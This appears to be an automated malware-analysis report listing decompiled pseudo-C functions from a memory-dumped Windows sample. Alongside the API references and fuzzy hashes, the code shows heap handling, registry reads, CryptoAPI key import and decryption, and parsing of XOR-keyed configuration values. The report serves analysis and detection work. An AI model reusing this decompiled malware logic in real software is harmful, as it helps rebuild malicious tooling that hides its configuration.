                                                        0x01207058
                                                        0x0120705e
                                                        0x01207060
                                                        0x01207065
                                                        0x01207066
                                                        0x01207066
                                                        0x0120706c
                                                        0x01207075
                                                        0x01207077
                                                        0x0120707a
                                                        0x01207089

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01207002
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: f962603dcaa276facd293ea80e36c7da7f229ba6d295e0b0c82a2e5190590fbe
                                                        • Instruction ID: 5d56081f5da3577b4ca525958c7b3cfdd4f06466a06806050b7a51c2a838b86e
                                                        • Opcode Fuzzy Hash: f962603dcaa276facd293ea80e36c7da7f229ba6d295e0b0c82a2e5190590fbe
                                                        • Instruction Fuzzy Hash: AC1124752953459FEB06CF2CC841BE97BAADB13358F14428EE5808B2D3C277950BC720
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 34%
                                                        			E01205ED2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                        				intOrPtr _v12;
                                                        				void* _v18;
                                                        				short _v20;
                                                        				intOrPtr _t15;
                                                        				short _t17;
                                                        				intOrPtr _t19;
                                                        				short _t23;
                                                        
                                                        				_t23 = 0;
                                                        				_v20 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosw");
                                                        				_t15 =  *0x120a2d4; // 0x455d5a8
                                                        				_t4 = _t15 + 0x120b394; // 0x576893c
                                                        				_t20 = _t4;
                                                        				_t6 = _t15 + 0x120b124; // 0x650047
                                                        				_t17 = E01203969(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                        				if(_t17 < 0) {
                                                        					_t23 = _t17;
                                                        				} else {
                                                        					if(_v20 != 8) {
                                                        						_t23 = 1;
                                                        					} else {
                                                        						_t19 = E01207206(_t20, _v12);
                                                        						if(_t19 == 0) {
                                                        							_t23 = 8;
                                                        						} else {
                                                        							 *_a16 = _t19;
                                                        						}
                                                        						__imp__#6(_v12);
                                                        					}
                                                        				}
                                                        				return _t23;
                                                        			}










                                                        APIs
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                          • Part of subcall function 01207206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,012067B6,004F0053,00000000,?), ref: 0120720F
                                                          • Part of subcall function 01207206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,012067B6,004F0053,00000000,?), ref: 01207239
                                                          • Part of subcall function 01207206: memset.NTDLL ref: 0120724D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01205F38
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeString$lstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 397948122-0
                                                        • Opcode ID: 807149443be5a70bf637d943f7577ade329884ac697d0f455ff9d91926b6fbf4
                                                        • Instruction ID: 8b9b561182b9b65828d6f0739db47853ce05e880b1263fa9b62372207a39ee59
                                                        • Opcode Fuzzy Hash: 807149443be5a70bf637d943f7577ade329884ac697d0f455ff9d91926b6fbf4
                                                        • Instruction Fuzzy Hash: CD01B53152012ABFDF23AF98CC08DAEBB78FB05700F000659EA01E60A2D3749915CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 89%
                                                        			E01205963(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                                        				char _v8;
                                                        				void* _t14;
                                                        				intOrPtr _t17;
                                                        				void* _t20;
                                                        				void* _t26;
                                                        
                                                        				_push(__ecx);
                                                        				if(_a4 == 0 || __eax == 0) {
                                                        					_t26 = 0x57;
                                                        				} else {
                                                        					_t14 = E01206FEA(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                                        					_t26 = _t14;
                                                        					if(_t26 == 0) {
                                                        						_t17 =  *0x120a2d4; // 0x455d5a8
                                                        						_t9 = _t17 + 0x120b9e8; // 0x444f4340
                                                        						_t20 = E012015AB( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                                        						_t26 = _t20;
                                                        						RtlFreeHeap( *0x120a290, 0, _a4); // executed
                                                        					}
                                                        				}
                                                        				return _t26;
                                                        			}








                                                        APIs
                                                          • Part of subcall function 01206FEA: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01207002
                                                          • Part of subcall function 012015AB: lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 012015DF
                                                          • Part of subcall function 012015AB: StrStrA.SHLWAPI(00000000,?), ref: 012015EC
                                                          • Part of subcall function 012015AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 0120160B
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,012077F2), ref: 012059B9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Heap$Allocate$Freelstrlen
                                                        • String ID:
                                                        • API String ID: 2220322926-0
                                                        • Opcode ID: 7b87ba0d244e7bb75bfbc5fc5036d7eed7e87da267e04280e84eff7a004a8b71
                                                        • Instruction ID: 16b89d6e95356e26f10d0016477b5adc8f6a2a036d9c435c5b15094fb39f4832
                                                        • Opcode Fuzzy Hash: 7b87ba0d244e7bb75bfbc5fc5036d7eed7e87da267e04280e84eff7a004a8b71
                                                        • Instruction Fuzzy Hash: 67018136110209FFDB23CF48DC54EAA7FB9EB44354F104225FA0A861A2E731EA54DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01205FBC(long _a4) {
                                                        				void* _t2;
                                                        
                                                        				_t2 = RtlAllocateHeap( *0x120a290, 0, _a4); // executed
                                                        				return _t2;
                                                        			}




                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 9b9b44285a1626fd51879d755a3f62f02156169109145f208788daa00fe48766
                                                        • Instruction ID: d8b318dd396420de31b340ef5e810d2d0b157cbefe668f5e0beec5a246f2371f
                                                        • Opcode Fuzzy Hash: 9b9b44285a1626fd51879d755a3f62f02156169109145f208788daa00fe48766
                                                        • Instruction Fuzzy Hash: 7BB01231018200AFCE238B00FD0CF057B33B750B00F108120B2090106A82320420EB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E012013CC(void* _a4) {
                                                        				char _t2;
                                                        
                                                        				_t2 = RtlFreeHeap( *0x120a290, 0, _a4); // executed
                                                        				return _t2;
                                                        			}




                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a5035acadc35d692facde243f4227eca0e4e4b026d47775a1d7b87a5f6c7b45d
                                                        • Instruction ID: 4e6241b6952f41753a32d6b6a43e9fab4f4a0ea1e03a31fc2f6265c31479bb34
                                                        • Opcode Fuzzy Hash: a5035acadc35d692facde243f4227eca0e4e4b026d47775a1d7b87a5f6c7b45d
                                                        • Instruction Fuzzy Hash: AEB01271104200AFCF338B00FE0CF057B23B750B00F004120B30D0007A82320420FF15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01202879(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                                        				void* _v8;
                                                        				int _v12;
                                                        				char _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				char _v32;
                                                        				char _v144;
                                                        				int _v148;
                                                        				intOrPtr _v152;
                                                        				intOrPtr _v156;
                                                        				intOrPtr _v160;
                                                        				char _v164;
                                                        				void* _t37;
                                                        				void* _t42;
                                                        				void* _t51;
                                                        				int _t53;
                                                        				void* _t60;
                                                        				void* _t63;
                                                        				void* _t64;
                                                        
                                                        				_t53 = 0;
                                                        				_t60 = __ecx;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                                        					L21:
                                                        					return _t53;
                                                        				} else {
                                                        					_t58 =  &_v164;
                                                        					_t37 = E01203C51(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                                        					if(_t37 != 0) {
                                                        						goto L21;
                                                        					}
                                                        					_t61 = _t60 - 0x80;
                                                        					if(_v148 > _t60 - 0x80) {
                                                        						goto L21;
                                                        					}
                                                        					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                                        						_t37 = _t37 + 1;
                                                        						if(_t37 < 0x10) {
                                                        							continue;
                                                        						}
                                                        						_t53 = _v148;
                                                        						_t51 = E01205FBC(_t53);
                                                        						_t73 = _t51;
                                                        						_v8 = _t51;
                                                        						if(_t51 != 0) {
                                                        							_t53 = 0;
                                                        							L18:
                                                        							if(_t53 != 0) {
                                                        								goto L21;
                                                        							}
                                                        							L19:
                                                        							if(_v8 != 0) {
                                                        								E012013CC(_v8);
                                                        							}
                                                        							goto L21;
                                                        						}
                                                        						memcpy(_t51, _a4, _t53);
                                                        						L8:
                                                        						_t63 = _v8;
                                                        						E01202C05(_t58, _t73, _t63, _t53,  &_v32);
                                                        						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                                        							L15:
                                                        							_t53 = 0;
                                                        							goto L19;
                                                        						} else {
                                                        							 *_a8 = _t63;
                                                        							goto L18;
                                                        						}
                                                        					}
                                                        					_t58 =  &_v144;
                                                        					_t42 = E01203276(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                                        					__eflags = _t42;
                                                        					if(_t42 != 0) {
                                                        						_t53 = _v12;
                                                        						goto L18;
                                                        					}
                                                        					_t53 = _v148;
                                                        					__eflags = _v12 - _t53;
                                                        					if(__eflags >= 0) {
                                                        						goto L8;
                                                        					}
                                                        					goto L15;
                                                        				}
                                                        			}























                                                        APIs
                                                        • memcpy.NTDLL(00000000,?,?,?,?,0120517B,?,0120517B,?,0120517B), ref: 01202900
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                        • Instruction ID: f70acaf2942dc9933e87fe781e24cb7f397d9ff771f3dfc4b446e8d6ec6097d1
                                                        • Opcode Fuzzy Hash: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                        • Instruction Fuzzy Hash: F631547192011EEFDF13DF98C8C4BADB778BB14254F2046AAE649A3193D7309E45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E012011B0(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                                        				void* _t24;
                                                        				signed short _t25;
                                                        				signed int _t27;
                                                        				intOrPtr* _t28;
                                                        				signed short _t29;
                                                        
                                                        				_t28 = __edi;
                                                        				if(_a4 == 0) {
                                                        					L2:
                                                        					_t29 = E01203B91(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                        					if(_t29 == 0) {
                                                        						_t27 = _a12 >> 1;
                                                        						if(_t27 == 0) {
                                                        							_t29 = 2;
                                                        							HeapFree( *0x120a290, 0, _a4);
                                                        						} else {
                                                        							_t24 = _a4;
                                                        							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                                                        							 *_t28 = _t24;
                                                        						}
                                                        					}
                                                        					L6:
                                                        					return _t29;
                                                        				}
                                                        				_t25 = E01205ED2(_a4, _a8, _a12, __edi); // executed
                                                        				_t29 = _t25;
                                                        				if(_t29 == 0) {
                                                        					goto L6;
                                                        				}
                                                        				goto L2;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01205ED2: SysFreeString.OLEAUT32(00000000), ref: 01205F38
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,01205372,?,004F0053,05769318,00000000,?), ref: 01201211
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Free$HeapString
                                                        • String ID:
                                                        • API String ID: 3806048269-0
                                                        • Opcode ID: d604f69b95a90f13ea264d4af7f09aaa442b6a1c3e173ac9ef5e607ba34e51ef
                                                        • Instruction ID: 41c3b22cda32e11a3f5e2f65dab5ef0445bf4ef876bfd4ec34fe4bd2030df11a
                                                        • Opcode Fuzzy Hash: d604f69b95a90f13ea264d4af7f09aaa442b6a1c3e173ac9ef5e607ba34e51ef
                                                        • Instruction Fuzzy Hash: A901287201022ABFCB239F48CC05FAA3B65BB54790F048229FF099A1A2D731C970DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E01206E5D(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                        				void* _t13;
                                                        				void* _t21;
                                                        
                                                        				_t11 =  &_a4;
                                                        				_t21 = 0;
                                                        				__imp__( &_a8);
                                                        				_t13 = E01203276( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                        				if(_t13 == 0) {
                                                        					_t21 = E01205FBC(_a8 + _a8);
                                                        					if(_t21 != 0) {
                                                        						E012061A5(_a4, _t21, _t23);
                                                        					}
                                                        					E012013CC(_a4);
                                                        				}
                                                        				return _t21;
                                                        			}

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 01206E6E
                                                          • Part of subcall function 01203276: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01206E82,00000001,01204A9F,00000000), ref: 012032AE
                                                          • Part of subcall function 01203276: memcpy.NTDLL(01206E82,01204A9F,00000010,?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000), ref: 012032C7
                                                          • Part of subcall function 01203276: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 012032F0
                                                          • Part of subcall function 01203276: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01203308
                                                          • Part of subcall function 01203276: memcpy.NTDLL(00000000,00000000,05769630,00000010), ref: 0120335A
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                        • String ID:
                                                        • API String ID: 894908221-0
                                                        • Opcode ID: afdbbeb2547c8c1b1044408f6359658ab7474c2b377c087a4891b88c33c88786
                                                        • Instruction ID: 08cb88be099e749d0ff387bdf1a9a441e73e4d93f3bc4ad582a1457daa3f9295
                                                        • Opcode Fuzzy Hash: afdbbeb2547c8c1b1044408f6359658ab7474c2b377c087a4891b88c33c88786
                                                        • Instruction Fuzzy Hash: FEF0303611050ABEDF136F55DC04CEB3FAEEF95250B008125B918CA152DA32DA559BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0120304F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                        				void* _t17;
                                                        
                                                        				if(_a4 == 0) {
                                                        					L2:
                                                        					return E012065FA(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                        				}
                                                        				_t17 = E01205F4F(_a4, _a8, _a12, _a16, _a20); // executed
                                                        				if(_t17 != 0) {
                                                        					goto L2;
                                                        				}
                                                        				return _t17;
                                                        			}

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,01205611,3D012090,80000002,0120755B,01203E52,74666F53,4D4C4B48,01203E52,?,3D012090,80000002,0120755B,?), ref: 01203074
                                                          • Part of subcall function 01205F4F: SysAllocString.OLEAUT32(01203E52), ref: 01205F69
                                                          • Part of subcall function 01205F4F: SysFreeString.OLEAUT32(00000000), ref: 01205FA9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$AllocFreelstrlen
                                                        • String ID:
                                                        • API String ID: 3808004451-0
                                                        • Opcode ID: 57a5c5e9b51210b1889b3a16cfed620eeeaa8e1c09df4d930de274d8fc62c2a8
                                                        • Instruction ID: 6d1c9bdd7ce29c5840d89ca8b570a1e610710299d1a7f4a2babbce6d72ea9005
                                                        • Opcode Fuzzy Hash: 57a5c5e9b51210b1889b3a16cfed620eeeaa8e1c09df4d930de274d8fc62c2a8
                                                        • Instruction Fuzzy Hash: 94F0923201020EFFDF169F94EC49EAA3F6AFB18354F048115FA19540A2D732C5B1EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01206997(void* __edi, void* _a4) {
                                                        				int _t7;
                                                        				int _t12;
                                                        
                                                        				_t7 = E012041D4(__edi, _a4,  &_a4); // executed
                                                        				_t12 = _t7;
                                                        				if(_t12 != 0) {
                                                        					memcpy(__edi, _a4, _t12);
                                                        					 *((char*)(__edi + _t12)) = 0;
                                                        					E012013CC(_a4);
                                                        				}
                                                        				return _t12;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 012041D4: memcpy.NTDLL(00000000,00000110,0120517B,0120517B,?,?,0120517B,?,?,012052EA,?), ref: 0120420A
                                                          • Part of subcall function 012041D4: memset.NTDLL ref: 01204280
                                                          • Part of subcall function 012041D4: memset.NTDLL ref: 01204294
                                                        • memcpy.NTDLL(0120517B,0120517B,00000000,0120517B,0120517B,0120517B,?,?,012052EA,?,?,0120517B,?), ref: 012069B3
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memcpymemset$FreeHeap
                                                        • String ID:
                                                        • API String ID: 3053036209-0
                                                        • Opcode ID: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                        • Instruction ID: eb83057281acbc2bfdc61d965d7280043cf81695d4dde2e5ea93ff82e2ceecb9
                                                        • Opcode Fuzzy Hash: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                        • Instruction Fuzzy Hash: C0E08C7650012AB6CB136A98DC00EFFBF5C8F626A0F004121FF088A242D631D660A7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 95%
                                                        			E0120725F(int* __ecx) {
                                                        				int _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* __esi;
                                                        				signed int _t28;
                                                        				signed int _t33;
                                                        				signed int _t39;
                                                        				char* _t45;
                                                        				char* _t46;
                                                        				char* _t47;
                                                        				char* _t48;
                                                        				char* _t49;
                                                        				char* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				intOrPtr _t53;
                                                        				signed int _t59;
                                                        				void* _t61;
                                                        				void* _t62;
                                                        				signed int _t64;
                                                        				signed int _t67;
                                                        				signed int _t71;
                                                        				signed int _t75;
                                                        				signed int _t79;
                                                        				signed int _t83;
                                                        				signed int _t87;
                                                        				void* _t92;
                                                        				intOrPtr _t109;
                                                        
                                                        				_t93 = __ecx;
                                                        				_t28 =  *0x120a2d0; // 0x69b25f44
                                                        				if(E01206BB2( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                        					 *0x120a324 = _v8;
                                                        				}
                                                        				_t33 =  *0x120a2d0; // 0x69b25f44
                                                        				if(E01206BB2( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                        					_v12 = 2;
                                                        					L57:
                                                        					return _v12;
                                                        				}
                                                        				_t39 =  *0x120a2d0; // 0x69b25f44
                                                        				if(E01206BB2( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                        					L55:
                                                        					HeapFree( *0x120a290, 0, _v16);
                                                        					goto L57;
                                                        				} else {
                                                        					_t92 = _v12;
                                                        					if(_t92 == 0) {
                                                        						_t45 = 0;
                                                        					} else {
                                                        						_t87 =  *0x120a2d0; // 0x69b25f44
                                                        						_t45 = E01202C90(_t93, _t92, _t87 ^ 0x7895433b);
                                                        					}
                                                        					if(_t45 != 0) {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                        							 *0x120a298 = _v8;
                                                        						}
                                                        					}
                                                        					if(_t92 == 0) {
                                                        						_t46 = 0;
                                                        					} else {
                                                        						_t83 =  *0x120a2d0; // 0x69b25f44
                                                        						_t46 = E01202C90(_t93, _t92, _t83 ^ 0x219b08c7);
                                                        					}
                                                        					if(_t46 != 0) {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                        							 *0x120a29c = _v8;
                                                        						}
                                                        					}
                                                        					if(_t92 == 0) {
                                                        						_t47 = 0;
                                                        					} else {
                                                        						_t79 =  *0x120a2d0; // 0x69b25f44
                                                        						_t47 = E01202C90(_t93, _t92, _t79 ^ 0x31fc0661);
                                                        					}
                                                        					if(_t47 != 0) {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                        							 *0x120a2a0 = _v8;
                                                        						}
                                                        					}
                                                        					if(_t92 == 0) {
                                                        						_t48 = 0;
                                                        					} else {
                                                        						_t75 =  *0x120a2d0; // 0x69b25f44
                                                        						_t48 = E01202C90(_t93, _t92, _t75 ^ 0x0cd926ce);
                                                        					}
                                                        					if(_t48 != 0) {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                        							 *0x120a004 = _v8;
                                                        						}
                                                        					}
                                                        					if(_t92 == 0) {
                                                        						_t49 = 0;
                                                        					} else {
                                                        						_t71 =  *0x120a2d0; // 0x69b25f44
                                                        						_t49 = E01202C90(_t93, _t92, _t71 ^ 0x3cd8b2cb);
                                                        					}
                                                        					if(_t49 != 0) {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                        							 *0x120a02c = _v8;
                                                        						}
                                                        					}
                                                        					if(_t92 == 0) {
                                                        						_t50 = 0;
                                                        					} else {
                                                        						_t67 =  *0x120a2d0; // 0x69b25f44
                                                        						_t50 = E01202C90(_t93, _t92, _t67 ^ 0x2878b929);
                                                        					}
                                                        					if(_t50 == 0) {
                                                        						L41:
                                                        						 *0x120a2a4 = 5;
                                                        						goto L42;
                                                        					} else {
                                                        						_t93 =  &_v8;
                                                        						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                        							goto L41;
                                                        						} else {
                                                        							L42:
                                                        							if(_t92 == 0) {
                                                        								_t51 = 0;
                                                        							} else {
                                                        								_t64 =  *0x120a2d0; // 0x69b25f44
                                                        								_t51 = E01202C90(_t93, _t92, _t64 ^ 0x261a367a);
                                                        							}
                                                        							if(_t51 != 0) {
                                                        								_push(_t51);
                                                        								_t61 = 0x10;
                                                        								_t62 = E01205BBA(_t61);
                                                        								if(_t62 != 0) {
                                                        									_push(_t62);
                                                        									E0120152E();
                                                        								}
                                                        							}
                                                        							if(_t92 == 0) {
                                                        								_t52 = 0;
                                                        							} else {
                                                        								_t59 =  *0x120a2d0; // 0x69b25f44
                                                        								_t52 = E01202C90(_t93, _t92, _t59 ^ 0xb9d404b2);
                                                        							}
                                                        							if(_t52 != 0 && E01205BBA(0, _t52) != 0) {
                                                        								_t109 =  *0x120a37c; // 0x5769630
                                                        								E01204013(_t109 + 4, _t57);
                                                        							}
                                                        							_t53 =  *0x120a2d4; // 0x455d5a8
                                                        							_t22 = _t53 + 0x120b2d2; // 0x576887a
                                                        							_t23 = _t53 + 0x120b7c4; // 0x6976612e
                                                        							 *0x120a320 = _t22;
                                                        							 *0x120a390 = _t23;
                                                        							HeapFree( *0x120a290, 0, _t92);
                                                        							_v12 = 0;
                                                        							goto L55;
                                                        						}
                                                        					}
                                                        				}
                                                        			}

                                                        APIs
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207304
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207336
